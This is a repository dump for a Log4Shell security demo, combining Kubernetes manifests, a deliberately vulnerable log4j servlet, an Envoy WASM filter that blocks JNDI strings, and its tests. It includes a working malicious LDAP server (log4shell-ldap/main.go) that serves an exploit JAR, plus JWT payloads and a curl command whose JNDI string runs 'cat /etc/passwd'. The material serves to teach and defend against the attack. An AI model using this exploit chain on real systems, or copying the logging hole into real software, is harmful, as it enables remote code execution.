name: NGAC_BACKEND_FILE_PATH 65 | value: /etc/ngac/graph.txt 66 | - name: NGAC_LOG_OUTPUT_LEVEL 67 | value: pdp:info 68 | volumes: 69 | - name: graph 70 | configMap: 71 | name: ngac-graph 72 | -------------------------------------------------------------------------------- /ngac/ngac-authz.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: Service 3 | metadata: 4 | name: ngac-authz 5 | labels: 6 | app: ngac-authz 7 | spec: 8 | ports: 9 | - name: grpc-ngac 10 | port: 8080 11 | targetPort: 8080 12 | selector: 13 | app: ngac-authz 14 | --- 15 | apiVersion: v1 16 | kind: ServiceAccount 17 | metadata: 18 | name: ngac-authz 19 | labels: 20 | app: ngac-authz 21 | --- 22 | apiVersion: apps/v1 23 | kind: Deployment 24 | metadata: 25 | name: ngac-authz 26 | labels: 27 | app: ngac-authz 28 | spec: 29 | replicas: 1 30 | selector: 31 | matchLabels: 32 | app: ngac-authz 33 | template: 34 | metadata: 35 | labels: 36 | app: ngac-authz 37 | spec: 38 | serviceAccountName: ngac-authz 39 | containers: 40 | - name: ngac-authz 41 | image: docker.io/nacx/ngac-agent:nist-2022 42 | imagePullPolicy: Always 43 | ports: 44 | - containerPort: 8080 45 | livenessProbe: 46 | initialDelaySeconds: 10 47 | periodSeconds: 10 48 | tcpSocket: 49 | port: 8080 50 | readinessProbe: 51 | initialDelaySeconds: 10 52 | periodSeconds: 10 53 | httpGet: 54 | path: /health 55 | port: 8080 56 | volumeMounts: 57 | - mountPath: /etc/ngac 58 | name: config 59 | env: 60 | - name: AGENT_ADDRESS 61 | value: :8080 62 | - name: AGENT_RESOLVER_CONFIG 63 | value: /etc/ngac/resolver.yaml 64 | - name: AGENT_LOG_OUTPUT_LEVEL 65 | value: pep:debug,pdp/audit:debug 66 | - name: AGENT_PDP_URI 67 | value: ngac-server:8080 68 | - name: AGENT_PDP_DISABLE_TLS 69 | value: "true" 70 | volumes: 71 | - name: config 72 | configMap: 73 | name: ngac-authz-config 74 | -------------------------------------------------------------------------------- /wasm-patch/main_test.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "testing" 5 | 6 | "github.com/stretchr/testify/require" 7 | 8 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm/proxytest" 9 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm/types" 10 | ) 11 | 12 | var ( 13 | // malicious JWT token for log4shell with the following claim: 14 | // "name": "${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}" 15 | // This contains a payload that will execute `cat /etc/passwd` on the vulnerable machine 16 | malicious = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE4MDA1NjMyNTQsImlhdCI6MTY0Mjc3NTI1NCwiaXNzIjoiZXZpbC5jbyIsIm5hbWUiOiIke2puZGk6bGRhcDovL2xvZzRzaGVsbDoxMzg5L2V4ZWMvWTJGMElDOWxkR012Y0dGemMzZGtDZz09fSIsInN1YiI6Im5hY3gifQ.I59rKl-z5QGKsbT3W9PCDidFrkPrL-iwZFakWy0L0JY" 17 | ) 18 | 19 | func TestHttpFilter_OnHttpRequestHeaders(t *testing.T) { 20 | opt := proxytest.NewEmulatorOption().WithVMContext(&vmContext{}) 21 | host, reset := proxytest.NewHostEmulator(opt) 22 | defer reset() 23 | 24 | // Call OnPluginStart -> the metric is initialized. 25 | status := host.StartPlugin() 26 | // Check the status returned by OnPluginStart is OK. 27 | require.Equal(t, types.OnPluginStartStatusOK, status) 28 | 29 | // Create http context. 30 | contextID := host.InitializeHttpContext() 31 | 32 | // Call OnHttpRequestHeaders no user 33 | action := host.CallOnRequestHeaders(contextID, [][2]string{}, false) 34 | require.Equal(t, types.ActionContinue, action) 35 | 36 | action = host.CallOnRequestHeaders(contextID, [][2]string{ 37 | {"Authorization", "Bearer " + malicious}, 38 | }, false) 39 | localResponse := host.GetSentLocalResponse(contextID) 40 | require.Equal(t, types.ActionPause, action) 41 | require.NotNil(t, localResponse) 42 | require.Equal(t, uint32(403), localResponse.StatusCode) 43 | 44 | host.CompleteHttpContext(contextID) 45 | 46 | // Check Envoy logs. 47 | logs := host.GetInfoLogs() 48 | require.Contains(t, logs, "no authorization header found") 49 | require.Contains(t, logs, "access granted for: anonymous") 50 | require.Contains(t, logs, "access denied for: ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}") 51 | } 52 | -------------------------------------------------------------------------------- /vulnerable-app/pom.xml: -------------------------------------------------------------------------------- 1 | 2 | 4.0.0 3 | io.tetrate 4 | vulnerable 5 | 1.0-SNAPSHOT 6 | 7 | 8 | 1.8 9 | 1.8 10 | UTF-8 11 | 2.13.0 12 | 9.4.24.v20191120 13 | 14 | 15 | 16 | 17 | javax.servlet 18 | servlet-api 19 | 3.0-alpha-1 20 | provided 21 | 22 | 23 | org.eclipse.jetty 24 | jetty-server 25 | ${jetty.version} 26 | 27 | 28 | org.eclipse.jetty 29 | jetty-servlet 30 | ${jetty.version} 31 | 32 | 33 | org.apache.logging.log4j 34 | log4j-core 35 | ${log4j.version} 36 | 37 | 38 | com.nimbusds 39 | nimbus-jose-jwt 40 | 4.11.2 41 | 42 | 43 | 44 | 45 | 46 | 47 | maven-assembly-plugin 48 | 49 | 50 | 51 | io.tetrate.log4shell.vulnerable.App 52 | 53 | 54 | 55 | jar-with-dependencies 56 | 57 | 58 | 59 | 60 | 61 | 62 | -------------------------------------------------------------------------------- /wasm-patch/local-envoy.yaml: -------------------------------------------------------------------------------- 1 | static_resources: 2 | listeners: 3 | - name: main 4 | address: 5 | socket_address: 6 | address: 0.0.0.0 7 | port_value: 8000 8 | filter_chains: 9 | - filters: 10 | - name: envoy.http_connection_manager 11 | typed_config: 12 | "@type": type.googleapis.com/envoy.extensions.filters.network.http_connection_manager.v3.HttpConnectionManager 13 | stat_prefix: ingress_http 14 | codec_type: auto 15 | route_config: 16 | name: local_route 17 | virtual_hosts: 18 | - name: local_service 19 | domains: 20 | - "*" 21 | routes: 22 | - match: 23 | prefix: "/" 24 | route: 25 | cluster: vulnerable 26 | http_filters: 27 | - name: envoy.filters.http.wasm 28 | typed_config: 29 | "@type": type.googleapis.com/udpa.type.v1.TypedStruct 30 | type_url: type.googleapis.com/envoy.extensions.filters.http.wasm.v3.Wasm 31 | value: 32 | config: 33 | vm_config: 34 | runtime: "envoy.wasm.runtime.v8" 35 | code: 36 | local: 37 | filename: "/opt/log4shell/log4shell-patch.wasm" 38 | - name: envoy.filters.http.router 39 | typed_config: {} 40 | 41 | clusters: 42 | - name: vulnerable 43 | connect_timeout: 1s 44 | type: STRICT_DNS 45 | load_assignment: 46 | cluster_name: vulnerable 47 | endpoints: 48 | - lb_endpoints: 49 | - endpoint: 50 | address: 51 | socket_address: 52 | address: vulnerable 53 | port_value: 8080 54 | 55 | admin: 56 | access_log_path: "/dev/null" 57 | address: 58 | socket_address: 59 | address: 0.0.0.0 60 | port_value: 15000 61 | -------------------------------------------------------------------------------- /k8s/gke/external-dns.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: v1 2 | kind: ServiceAccount 3 | metadata: 4 | name: external-dns 5 | --- 6 | apiVersion: rbac.authorization.k8s.io/v1 7 | kind: ClusterRole 8 | metadata: 9 | name: external-dns 10 | rules: 11 | - apiGroups: [""] 12 | resources: ["services","endpoints","pods"] 13 | verbs: ["get","watch","list"] 14 | - apiGroups: ["extensions","networking.k8s.io"] 15 | resources: ["ingresses"] 16 | verbs: ["get","watch","list"] 17 | - apiGroups: [""] 18 | resources: ["nodes"] 19 | verbs: ["list"] 20 | - apiGroups: ["networking.istio.io"] 21 | resources: ["gateways", "virtualservices"] 22 | verbs: ["get","watch","list"] 23 | --- 24 | apiVersion: rbac.authorization.k8s.io/v1 25 | kind: ClusterRoleBinding 26 | metadata: 27 | name: external-dns-viewer 28 | roleRef: 29 | apiGroup: rbac.authorization.k8s.io 30 | kind: ClusterRole 31 | name: external-dns 32 | subjects: 33 | - kind: ServiceAccount 34 | name: external-dns 35 | namespace: cert-manager 36 | --- 37 | apiVersion: apps/v1 38 | kind: Deployment 39 | metadata: 40 | name: external-dns 41 | spec: 42 | selector: 43 | matchLabels: 44 | app: external-dns 45 | template: 46 | metadata: 47 | labels: 48 | app: external-dns 49 | spec: 50 | serviceAccountName: external-dns 51 | containers: 52 | - name: external-dns 53 | image: k8s.gcr.io/external-dns/external-dns:v0.10.2 54 | args: 55 | - --source=service 56 | - --source=ingress 57 | - --source=istio-gateway 58 | - --source=istio-virtualservice 59 | - --domain-filter=${DNS_ZONE} # will make ExternalDNS see only the hosted zones matching provided domain, omit to process all available hosted zones 60 | - --provider=google 61 | - --google-project=${PROJECT_ID} # Use this to specify a project different from the one external-dns is running inside 62 | - --policy=upsert-only # would prevent ExternalDNS from deleting any records, omit to enable full synchronization 63 | - --registry=txt 64 | - --txt-owner-id=external-dns-owner-id 65 | volumeMounts: 66 | - name: google-cloud-key 67 | mountPath: /var/secrets/google 68 | env: 69 | - name: GOOGLE_APPLICATION_CREDENTIALS 70 | value: /var/secrets/google/key.json 71 | volumes: 72 | - name: google-cloud-key 73 | secret: 74 | secretName: clouddns-dns01-solver-sa 75 | -------------------------------------------------------------------------------- /k8s/variables.example.env: -------------------------------------------------------------------------------- 1 | # Environment variables to be configured when deploying 2 | # the demo to Kubernetes 3 | 4 | ### Docker images ### 5 | 6 | # Docker registry where the application images will be deployed 7 | # Required: Always 8 | export HUB= 9 | 10 | # Istio 1.12 does not yet support imagePullSecrets in 11 | # WasmPlugins to pull images from private registries. 12 | # We need to push the WASM patch to a public Docker registry. 13 | # Required: Always 14 | export WASM_HUB=docker.io/nacx 15 | 16 | # Tag used when building all images 17 | # Required: Always 18 | export TAG=0.1 19 | 20 | 21 | ### Auth0 configuration ### 22 | 23 | # OIDC credentials 24 | # Required: Always 25 | export OIDC_CLIENT_ID= 26 | export OIDC_CLIENT_SECRET= 27 | 28 | # Auth0 application domain. 29 | # Go to your Application settings in Auth0 and set the 30 | # value of the 'Domain' field here (prefixed with https://). 31 | # Required: Always 32 | export AUTH0_URL="https://" 33 | 34 | 35 | ### Application configuration ### 36 | 37 | # Google Cloud project where the Kubernetes cluster is running 38 | # Required: In 'gke' mode 39 | export PROJECT_ID= 40 | 41 | # Custom domain name for your application: 42 | # - If you are using the 'local' mode, set it to "localhost" 43 | # - If you have a public DNS managed in Google Cloud DNS, set it 44 | # to the domain name where the application will be exposed. 45 | # This hostname will be configurad in the Istio ingress gateway. 46 | # For example: myapp.example.com 47 | # Note that this name doesn't need to exist in CloudDNS. I will 48 | # be automatically created by external-dns. 49 | # Required: Always 50 | export DOMAIN=localhost 51 | 52 | # Custom port for your application. 53 | # - In 'local' mode set it to ':8443' (including the leading ':') 54 | # - In 'gke' mode, set it to an empty value. It is important that the 55 | # variable EXISTS with an empty value. 56 | # Required: Always 57 | export DOMAIN_PORT=:8443 58 | 59 | # If you are using the Cloud DNS deployment, configure here the name 60 | # of the DNS zone the application domain belongs to. The DNS zone must 61 | # exist in Cloud DNS. 62 | # For example: example.com 63 | # Required: In 'gke' mode 64 | export DNS_ZONE= 65 | 66 | # Email of your Google Cloud account 67 | # Required: In 'gke' mode 68 | export EMAIL=$(gcloud auth list --filter=status:ACTIVE --format="value(account)") 69 | 70 | # Fixture to make sure the Istio Ingress Gateway is properly configured 71 | # when using the 'local' mode. Do not remove. 72 | export INGRESS_HOST=$DOMAIN 73 | if [[ "$DOMAIN" == "localhost" ]]; then 74 | export INGRESS_HOST='*' 75 | fi 76 | -------------------------------------------------------------------------------- /k8s/manifests/istio-authservice.yaml: -------------------------------------------------------------------------------- 1 | apiVersion: apps/v1 2 | kind: Deployment 3 | metadata: 4 | name: authservice 5 | labels: 6 | app: authservice 7 | spec: 8 | replicas: 1 9 | selector: 10 | matchLabels: 11 | app: authservice 12 | template: 13 | metadata: 14 | labels: 15 | app: authservice 16 | spec: 17 | volumes: 18 | - name: authservice-config 19 | configMap: 20 | name: authservice 21 | containers: 22 | - name: authservice 23 | image: ghcr.io/istio-ecosystem/authservice/authservice:0.5.0 24 | imagePullPolicy: IfNotPresent 25 | ports: 26 | - containerPort: 10003 27 | volumeMounts: 28 | - name: authservice-config 29 | mountPath: /etc/authservice 30 | readinessProbe: 31 | httpGet: 32 | path: /healthz 33 | port: 10004 34 | --- 35 | apiVersion: v1 36 | kind: Service 37 | metadata: 38 | name: authservice 39 | labels: 40 | app: authservice 41 | spec: 42 | ports: 43 | - port: 10003 44 | name: grpc 45 | selector: 46 | app: authservice 47 | --- 48 | kind: ConfigMap 49 | apiVersion: v1 50 | metadata: 51 | name: authservice 52 | data: 53 | # We listen on 0.0.0.0 since Istio 1.10, it changes the sidecar configuration only support 54 | # application listen on pod IP. See https://istio.io/latest/blog/2021/upcoming-networking-changes/ 55 | # for more details. 56 | config.json: | 57 | { 58 | "listen_address": "0.0.0.0", 59 | "listen_port": "10003", 60 | "log_level": "trace", 61 | "threads": 8, 62 | "chains": [ 63 | { 64 | "name": "idp_filter_chain", 65 | "filters": [ 66 | { 67 | "oidc": 68 | { 69 | "authorization_uri": "${AUTH0_URL}/authorize", 70 | "token_uri": "${AUTH0_URL}/oauth/token", 71 | "callback_uri": "https://${DOMAIN}${DOMAIN_PORT}/oauth/callback", 72 | "jwks_fetcher": { 73 | "jwks_uri": "${AUTH0_URL}/.well-known/jwks.json", 74 | "periodic_fetch_interval_sec": 60 75 | }, 76 | "client_id": "${OIDC_CLIENT_ID}", 77 | "client_secret": "${OIDC_CLIENT_SECRET}", 78 | "scopes": ["openid", "profile", "email"], 79 | "cookie_name_prefix": "authservice", 80 | "id_token": { 81 | "preamble": "Bearer", 82 | "header": "Authorization" 83 | }, 84 | "logout": { 85 | "path": "/logout", 86 | "redirect_uri": "${AUTH0_URL}/v2/logout?client_id=${OIDC_CLIENT_ID}&returnTo=https://${DOMAIN}${DOMAIN_PORT}" 87 | } 88 | } 89 | } 90 | ] 91 | } 92 | ] 93 | } 94 | -------------------------------------------------------------------------------- /vulnerable-app/src/main/java/io/tetrate/log4shell/vulnerable/GreetingsServlet.java: -------------------------------------------------------------------------------- 1 | package io.tetrate.log4shell.vulnerable; 2 | 3 | import java.io.IOException; 4 | 5 | import javax.servlet.ServletException; 6 | import javax.servlet.http.HttpServlet; 7 | import javax.servlet.http.HttpServletRequest; 8 | import javax.servlet.http.HttpServletResponse; 9 | 10 | import com.nimbusds.jose.JWSObject; 11 | 12 | import org.apache.logging.log4j.LogManager; 13 | import org.apache.logging.log4j.Logger; 14 | 15 | import net.minidev.json.JSONObject; 16 | 17 | public class GreetingsServlet extends HttpServlet { 18 | 19 | private static final long serialVersionUID = 1L; 20 | 21 | private static final String NAME_CLAIM = "name"; 22 | 23 | private static final String GROUP_CLAIM = "https://zta-demo/group"; 24 | 25 | private static Logger log = LogManager.getLogger(GreetingsServlet.class.getName()); 26 | 27 | @Override 28 | protected void doGet(HttpServletRequest request, HttpServletResponse response) 29 | throws ServletException, IOException { 30 | 31 | String user = "anonymous"; 32 | String group = null; 33 | JWSObject token = getToken(request); 34 | if (token != null) { 35 | JSONObject payload = token.getPayload().toJSONObject(); 36 | user = (String) payload.get(NAME_CLAIM); 37 | group = (String) payload.get(GROUP_CLAIM); 38 | 39 | // These log lines may trigger the log4shell attach vector if the JWT token contains 40 | // any malicious claim! 41 | log.info("token payload: " + payload.toJSONString()); 42 | log.info("user resolved to: " + user); 43 | } 44 | 45 | response.setContentType("text/plain"); 46 | response.setStatus(HttpServletResponse.SC_OK); 47 | response.getWriter().println("Welcome, " + user + "!"); 48 | if (group != null) response.getWriter().println("Group: " + group); 49 | response.getWriter().println("Accessing: " + request.getRequestURI().substring(request.getContextPath().length())); 50 | if (token != null) response.getWriter().println("\n\nAuthenticated with token:\n" + token.serialize()); 51 | } 52 | 53 | private JWSObject getToken(HttpServletRequest req) { 54 | String auth = req.getHeader("Authorization"); 55 | if (auth == null) { 56 | auth = req.getHeader("authorization"); 57 | if (auth == null) { 58 | log.debug("no authorization header present"); 59 | return null; 60 | } 61 | } 62 | 63 | String[] parts = auth.split(" "); 64 | if (parts.length != 2) { 65 | log.debug("invalid authorization header value"); 66 | return null; 67 | } 68 | 69 | try { 70 | return JWSObject.parse(parts[1]); 71 | } catch (Exception ex) { 72 | ex.printStackTrace(); 73 | return null; 74 | } 75 | } 76 | } 77 | -------------------------------------------------------------------------------- /log4shell-ldap/main.go: -------------------------------------------------------------------------------- 1 | // This file is based on https://github.com/jerrinot/log4shell-ldap 2 | 3 | package main 4 | 5 | import ( 6 | "embed" 7 | "flag" 8 | "fmt" 9 | "io/ioutil" 10 | "log" 11 | "net/http" 12 | "os" 13 | "os/signal" 14 | "strings" 15 | "syscall" 16 | 17 | "github.com/lor00x/goldap/message" 18 | ldap "github.com/vjeantet/ldapserver" 19 | ) 20 | 21 | //go:embed log4shell-exploit-1.0-SNAPSHOT.jar 22 | var jar embed.FS 23 | 24 | var publicHost string 25 | 26 | const ( 27 | exploitJar = "log4shell-exploit-1.0-SNAPSHOT.jar" 28 | javaClass = "io.tetrate.log4shell.exploit.Log4shellExploit" 29 | ) 30 | 31 | func main() { 32 | flag.StringVar(&publicHost, "publicIp", os.Getenv("publicIp"), "Usage:$ log4shell-ldap -publicIp 192.168.1.1") 33 | flag.Parse() 34 | 35 | ldapServer := startLdapServer() 36 | startHttpServer() 37 | 38 | fmt.Println("log4shell server started") 39 | 40 | ch := make(chan os.Signal, 2) 41 | signal.Notify(ch, syscall.SIGINT, syscall.SIGTERM) 42 | <-ch 43 | close(ch) 44 | ldapServer.Stop() 45 | } 46 | 47 | func startLdapServer() *ldap.Server { 48 | ldap.Logger = log.New(ioutil.Discard, "", log.LstdFlags) 49 | server := ldap.NewServer() 50 | routes := ldap.NewRouteMux() 51 | routes.Search(handleSearch) 52 | routes.Bind(handleBind) 53 | server.Handle(routes) 54 | go func() { 55 | err := server.ListenAndServe("0.0.0.0:1389") 56 | if err != nil { 57 | panic(err) 58 | } 59 | }() 60 | return server 61 | } 62 | 63 | func startHttpServer() { 64 | var staticFS = http.FS(jar) 65 | fs := http.FileServer(staticFS) 66 | http.Handle("/"+exploitJar, fs) 67 | go func() { 68 | err := http.ListenAndServe(":3000", nil) 69 | if err != nil { 70 | panic(err) 71 | } 72 | }() 73 | } 74 | 75 | func getOwnAddress(m *ldap.Message) string { 76 | if publicHost != "" { 77 | return publicHost 78 | } 79 | return strings.Split(m.Client.GetConn().LocalAddr().String(), ":")[0] 80 | } 81 | 82 | func handleSearch(w ldap.ResponseWriter, m *ldap.Message) { 83 | r := m.GetSearchRequest() 84 | select { 85 | case <-m.Done: 86 | return 87 | default: 88 | } 89 | 90 | fmt.Printf("received request from %s\n", m.Client.GetConn().RemoteAddr()) 91 | 92 | codebase := message.AttributeValue(fmt.Sprintf("http://%s:3000/%s", getOwnAddress(m), exploitJar)) 93 | e := ldap.NewSearchResultEntry("cn=pwned, " + string(r.BaseObject())) 94 | e.AddAttribute("cn", "pwned") 95 | e.AddAttribute("javaClassName", javaClass) 96 | e.AddAttribute("javaCodeBase", codebase) 97 | e.AddAttribute("objectclass", "javaNamingReference") 98 | e.AddAttribute("javaFactory", javaClass) 99 | 100 | fmt.Printf("delivering malicious LDAP payload: %v\n", e) 101 | 102 | w.Write(e) 103 | w.Write(ldap.NewSearchResultDoneResponse(ldap.LDAPResultSuccess)) 104 | } 105 | 106 | func handleBind(w ldap.ResponseWriter, m *ldap.Message) { 107 | w.Write(ldap.NewBindResponse(ldap.LDAPResultSuccess)) 108 | } 109 | -------------------------------------------------------------------------------- /wasm-patch/main.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "encoding/base64" 5 | "strings" 6 | 7 | "github.com/buger/jsonparser" 8 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm" 9 | "github.com/tetratelabs/proxy-wasm-go-sdk/proxywasm/types" 10 | ) 11 | 12 | func main() { 13 | proxywasm.SetVMContext(&vmContext{}) 14 | } 15 | 16 | type vmContext struct { 17 | // Embed the default VM context here, 18 | // so that we don't need to reimplement all the methods. 19 | types.DefaultVMContext 20 | } 21 | 22 | // Override types.DefaultVMContext. 23 | func (*vmContext) NewPluginContext(contextID uint32) types.PluginContext { 24 | return &pluginContext{} 25 | } 26 | 27 | type pluginContext struct { 28 | // Embed the default plugin context here, 29 | // so that we don't need to reimplement all the methods. 30 | types.DefaultPluginContext 31 | } 32 | 33 | // Override types.DefaultPluginContext. 34 | func (*pluginContext) NewHttpContext(contextID uint32) types.HttpContext { 35 | return &httpContext{contextID: contextID} 36 | } 37 | 38 | type httpContext struct { 39 | // Embed the default http context here, 40 | // so that we don't need to reimplement all the methods. 41 | types.DefaultHttpContext 42 | contextID uint32 43 | } 44 | 45 | // Override proxywasm.DefaultHttpContext 46 | func (*httpContext) OnHttpRequestHeaders(numHeaders int, endOfStream bool) types.Action { 47 | subject := getClaimValue("name") 48 | 49 | if strings.Contains(subject, "jndi") { 50 | proxywasm.LogInfof("access denied for: %s", subject) 51 | if err := proxywasm.SendHttpResponse(403, nil, []byte("Access Denied\n"), -1); err != nil { 52 | proxywasm.LogErrorf("failed to send local response: %v", err) 53 | proxywasm.ResumeHttpRequest() 54 | } 55 | return types.ActionPause 56 | } 57 | 58 | proxywasm.LogInfof("access granted for: %s", subject) 59 | 60 | return types.ActionContinue 61 | } 62 | 63 | // getClaimValue returns the value of the given claim. 64 | // This method assumes the claim has a string value. 65 | func getClaimValue(claim string) string { 66 | headers, err := proxywasm.GetHttpRequestHeaders() 67 | if err != nil { 68 | proxywasm.LogCriticalf("failed to get request headers: %v", err) 69 | return "" 70 | } 71 | 72 | var auth string 73 | for _, h := range headers { 74 | if strings.ToLower(h[0]) == "authorization" { 75 | auth = h[1] 76 | break 77 | } 78 | } 79 | if auth == "" { 80 | proxywasm.LogInfof("no authorization header found") 81 | return "anonymous" 82 | } 83 | 84 | token := auth[strings.Index(auth, " ")+1:] 85 | parts := strings.Split(token, ".") 86 | if len(parts) != 3 { 87 | proxywasm.LogErrorf("invalid jwt token: %v", err) 88 | return "anonymous" 89 | } 90 | 91 | body, err := base64.RawURLEncoding.DecodeString(parts[1]) 92 | if err != nil { 93 | proxywasm.LogErrorf("invalid jwt token body: %v", err) 94 | return "anonymous" 95 | } 96 | 97 | res, err := jsonparser.GetString(body, claim) 98 | if err != nil { 99 | proxywasm.LogErrorf("invalid jwt token body: %v", err) 100 | return "anonymous" 101 | } 102 | 103 | return res 104 | } 105 | -------------------------------------------------------------------------------- /k8s/README.md: -------------------------------------------------------------------------------- 1 | # ZTA and DevSecOps for Cloud Native Applications demo setup 2 | 3 | The demo scenario is deployed on a GKE Kubernetes cluster and uses 4 | [Auth0](https://auth0.com/) as an OIDC Identity Provider. Follow these 5 | instructions to deploy the demo scenario on a Kubernetes cluster. 6 | 7 | ## Requirements 8 | 9 | The following tools are required to build the environment: 10 | 11 | * [istioctl 1.12](https://istio.io/latest/docs/setup/getting-started/#download) 12 | * gcloud 13 | * envsubst 14 | * openssl 15 | * kustomize 16 | 17 | ## Demo profiles 18 | 19 | The demo can be deployed in two different ways depending on the infrastructure that is available: 20 | 21 | | Profile | Description | 22 | |---------|------------| 23 | | local | Deploys everything on the GKE cluster and relies on Kubernetes port-forwarding to expose the Istio Ingress Gateway in `localhost`. | 24 | | gke | Uses `cert-manager` and `Google Cloud DNS` to configure the certificates and hostnames where the application will be exposed via the Istio Ingress Gateway. Requires a real DNS zone managed in the GKE project. | 25 | 26 | ## Auth0 application setup 27 | 28 | The demo uses [Auth0](https://auth0.com/) as an OIDC Identity Provider to enforce users are authenticated. 29 | Follow these instructions to configure an application for the demo: 30 | 31 | * In the Auth0 admin console, go to **Applications > Applications > Create Application**. 32 | * Select **Regular Web Applications**, give it a name, and **Create**. 33 | * Go to the **Settings** tab and configure the following, according to the profile you want to use (gke/local): 34 | * **Allowed Callback URLs:** 35 | * For the `local` profile: `https://localhost:8443/oauth/callback` 36 | * For the `gke` profile: `https:///oauth/callback` 37 | * **Allowed Logout URLs:** 38 | * For the `local` profile: `https://localhost:8443` 39 | * For the `gke` profile: `https://` 40 | * Scroll down to the **Advanced** section, and in the **OAuth** tag, make sure the 41 | **OIDC Conformant** option is enabled. 42 | * Go to **Users Management > Users > Create User**. Enter the requested data and **Create**. 43 | 44 | ## Environment setup 45 | 46 | Once the Auth0 application has been created, configure the environment variables that 47 | will be used to customize the deployment process. Make a copy of the 48 | [variables.example.env](variables.example.env) file, name it `variables.env`, and modify 49 | it according to your needs. 50 | 51 | Once the file is there, you're ready to go! 52 | 53 | ## Deployment steps 54 | 55 | Before applying the Kubernetes manifest following the instructions below, build all the images: 56 | 57 | ```bash 58 | $ source variables.env 59 | $ make -C ../ clean docker-build docker-push 60 | ``` 61 | 62 | ### gke mode 63 | 64 | To deploy the demo in `gke` mode and leverage automatic certificate issuance and DNS 65 | configuration, do it as follows: 66 | 67 | ```bash 68 | $ make install/gke 69 | ``` 70 | 71 | If the deployment fails because of a `cert-manager` webhook issue, just run the command again. It takes 72 | quite some time until cert-manager is fully functional. 73 | Once the deployment completes you can open a browser to `https://` 74 | 75 | ### local mode 76 | 77 | To deploy the demo in `local` mode, install the application as follows and expose the 78 | Istio ingress gateway locally: 79 | 80 | ```bash 81 | $ make install/local 82 | $ kubectl -n istio-system port-forward svc/istio-ingressgateway 8443:443 83 | ``` 84 | 85 | Once the deployment completes you can open a browser to `https://localhost:8443` 86 | 87 | ## Environment cleanup 88 | 89 | To cleanup the environment and uninstall everything from the cluster, you can use 90 | the following commands, according to the mode you used in the installation process: 91 | 92 | ```bash 93 | $ make uninstall/gke 94 | ``` 95 | 96 | or 97 | 98 | ```bash 99 | $ make uninstall/local 100 | ``` 101 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ZTA and DevSecOps for Cloud Native Applications 2 | 3 | This repository contains the materials for the *Service Mesh as the Security Kernel for Zero Trust Platforms* 4 | demo presented at the NIST ZTA conference 2022. 5 | 6 | ## Contents 7 | 8 | This demo contains three main applications: 9 | 10 | * [log4shell-ldap](log4shell-ldap): A malicious LDAP server that can be used to exploit the `Log4Shell` CVEs. 11 | * [vulnerable-app](vulnerable-app): An application that uses an old and insecure Java runtime and a vulnerable 12 | version of the `log4j` library. 13 | * [wasm-patch](wasm-patch): An [Envoy](https://www.envoyproxy.io/) [WASM extension](https://github.com/proxy-wasm/spec) written 14 | in Go using the [proxy-wasm-go-sdk](https://github.com/tetratelabs/proxy-wasm-go-sdk) that inspects requests and 15 | rejects those that contain `Log4Shell` payloads. 16 | 17 | See the [hacking](#hacking) section for details about how to customize them. 18 | 19 | ## Build requirements 20 | 21 | * [Go 1.17](https://go.dev/dl/) or higher. 22 | * [TinyGo](https://tinygo.org/) to compile and build the WASM plugin. 23 | * [Docker](https://www.docker.com/) to create the Docker containers. 24 | 25 | ## Hacking 26 | 27 | The behavior of the applications can be customized by modifying the [GreetingsServlet.java](vulnerable-app/src/main/java/io/tetrate/log4shell/vulnerable/GreetingsServlet.java) 28 | (vulnerable application) and the [Log4shellExploit.java](log4shell-ldap/exploit/src/main/java/io/tetrate/log4shell/exploit/Log4shellExploit.java) (exploit). 29 | 30 | The current implementation of the exploit reads malicious LDAP lookup strings and parses a Base64-encoded command that is then executed. For example, the 31 | malicious string `"${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}"` will instruct the exploit to execute a `cat /etc/passwd` command. The vulnerable 32 | application logs the value of the `name` claim in a JWT token, so if the malicious payload is set there, the exploit will be triggered. 33 | 34 | ### Running applications locally 35 | 36 | The three applications can be easily run locally, although you won't be able to try all the [Istio](https://istio.io/) 37 | features showcased in the demo. However, it is enough to get the applications running and to be able to play with them 38 | and the WASM plugin. 39 | 40 | You can start the applications locally with: 41 | 42 | ```bash 43 | make -C wasm-patch clean compile # docker-compose needs the WASM binary to have been compiled 44 | docker-compose build 45 | docker-compose up 46 | ``` 47 | 48 | This will build the necessary images and start all of them. The vulnerable application is exposed as follows: 49 | 50 | * `http://localhost:8080` - Direct access to the vulnerable application. 51 | * `http://localhost:8000` - Access through Envoy, which includes filtering with the WASM plugin. 52 | 53 | To test it, you can send a request to the application or Envoy proxy with a JWT Bearer token in the Authorization header. 54 | The contents of the "sub" claim in the provided token will trigger the attack vector, if present. For example: 55 | 56 | **Executing the requests directly against the vulnerable app** 57 | 58 | ```bash 59 | $ curl http://localhost:8080 60 | Welcome, anonymous! 61 | Accessing: / 62 | 63 | $ curl http://localhost:8080 -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJleHAiOjE2NDMyMTY1NTEsImlhdCI6MTY0MzIxMjk1MSwiaXNzIjoidGV0cmF0ZS5pbyIsIm5hbWUiOiIke2puZGk6bGRhcDovL2xvZzRzaGVsbDoxMzg5L2V4ZWMvWTJGMElDOWxkR012Y0dGemMzZGtDZz09fSIsInN1YiI6ImFkbWluIn0.KTpoau4cr75ifcvESisRnwJP6_8fxzLrY2MsvgPBITI" 64 | Welcome, ${jndi:ldap://log4shell:1389/exec/Y2F0IC9ldGMvcGFzc3dkCg==}! 65 | Accessing: / 66 | ``` 67 | 68 | We can see that the exploit was triggered by inspecting the vulnerable app logs: 69 | 70 | ``` 71 | log4shell_1 | received request from 192.168.160.3:37650 72 | log4shell_1 | delivering malicious LDAP payload: {cn=pwned, exec/Y2F0IC9ldGMvcGFzc3dkCg== [{cn [pwned]} {javaClassName [io.tetrate.log4shell.exploit.Log4shellExploit]} {javaCodeBase 